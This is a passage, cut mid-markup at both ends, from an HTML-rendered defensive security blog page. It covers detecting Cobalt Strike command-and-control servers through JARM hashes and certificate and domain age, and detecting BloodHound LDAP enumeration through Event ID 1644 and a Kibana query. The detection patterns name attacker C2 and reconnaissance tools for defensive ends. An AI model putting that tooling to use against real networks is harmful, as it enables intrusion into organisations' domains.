jitter</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort jitter</span><br></span></code></pre></div></div>\n<p><strong>JARM fingerprint matching</strong></p>\n<p>JARM fingerprints TLS servers. Default Cobalt Strike team servers have known JARM hashes regardless of the domain or certificate used.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Fingerprint a suspicious C2 candidate</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">python3 jarm.py suspicious-domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">.</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">com </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-p</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">443</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Known malicious JARM hashes (Cobalt Strike defaults as of 2023):</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 2ad2ad0002ad2ad22c42d42d000000032d2ad2ad2ad2ad2ad0ad23abf4b834</span><br></span></code></pre></div></div>\n<p><strong>Certificate age + infrastructure freshness (Python)</strong></p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> ssl</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> socket</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> datetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">check_c2_indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    indicators </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Check certificate issuance date</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ctx </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> ssl</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">create_default_context</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> ctx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">wrap_socket</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">socket</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">socket</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> server_hostname</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> s</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        s</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">connect</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">443</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        cert </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> s</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">getpeercert</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        not_before </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strptime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            cert</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'notBefore'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"%b %d %H:%M:%S %Y %Z\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        cert_age_days </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">utcnow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> not_before</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">days</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'cert_young'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> cert_age_days </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">30</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Fresh cert: suspicious</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Check domain registration age via WHOIS</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> whois</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    w </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> whois</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">whois</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> w</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">creation_date</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        reg_date </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> w</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">creation_date</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">isinstance</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">w</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">creation_date</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> w</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">creation_date</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        domain_age </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">utcnow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> reg_date</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">days</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'domain_young'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> domain_age </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">90</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Score: cert_young + domain_young + suspicious_asn = high confidence C2</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    score </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sum</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'cert_young'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                 indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'domain_young'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'suspicion_score'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> score</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> indicators</span><br></span></code></pre></div></div>\n<p>Domains scoring 2/2 on this check warrant immediate investigation.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"checkpoint-2-bloodhound-collection-detection\">Checkpoint 2: BloodHound Collection Detection<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#checkpoint-2-bloodhound-collection-detection\" class=\"hash-link\" aria-label=\"Direct link to Checkpoint 2: BloodHound Collection Detection\" title=\"Direct link to Checkpoint 2: BloodHound Collection Detection\" translate=\"no\">​</a></h3>\n<p>The LDAP burst signature is distinctive. Alert condition: <strong>more than 150 Event ID 1644 entries from a single non-DC source within 5 minutes.</strong></p>\n<p>Event ID 1644 must be enabled explicitly:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Enable on all DCs via GPO or registry:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Diagnostics\" /v \"15 Field Engineering\" /t REG_DWORD /d 5 /f</span><br></span></code></pre></div></div>\n<p>Kibana query:</p>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"query\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"bool\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"must\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"term\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"event.code\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"1644\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"term\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"winlog.channel\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Directory Service\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"range\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"@timestamp\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"gte\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"now-5m\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"should\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"wildcard\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"winlog.event_data.Filter\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"*objectClass=computer*\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"wildcard\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"winlog.event_data.Filter\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"*nTSecurityDescriptor*\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"wildcard\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"winlog.event_data.Filter\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"*servicePrincipalName*\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"minimum_should_match\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 